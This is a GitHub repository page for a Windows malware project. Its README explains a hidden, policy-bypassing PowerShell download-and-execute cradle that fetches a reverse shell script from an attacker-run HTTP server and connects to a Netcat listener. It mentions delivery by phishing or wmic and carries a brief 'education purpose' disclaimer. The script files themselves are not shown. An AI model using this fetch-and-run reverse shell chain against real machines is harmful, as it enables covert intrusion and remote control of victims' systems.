Skip to content

francose/windows_malware

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
__pycache__
__pycache__
 
 
README.md
README.md
 
 
malware.bat
malware.bat
 
 
obfuscation-techniques.md
obfuscation-techniques.md
 
 
payload.bat
payload.bat
 
 
reverse.ps1
reverse.ps1
 
 
server.py
server.py
 
 

Repository files navigation

What This Does?

  • NoP → No Profile (Speeds up execution)
  • NonI → Non-Interactive Mode
  • W Hidden → Hides the PowerShell Window
  • Exec Bypass → Bypasses Execution Policy (Runs scripts without restrictions)
  • IEX(New-Object Net.WebClient).DownloadString(...) → Downloads and executes reverse.ps1.

Attack Vector?

Delivered via Phishing and Script Execution. Could be embedded inside wmic process call create.

This is for education purpose please do not use for malicouse purposes.

About

A Python HTTP server hosts a PowerShell reverse shell script. PowerShell downloads and executes it, connecting back to a Netcat listener. This exploits trusted system utilities for stealthy remote access.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages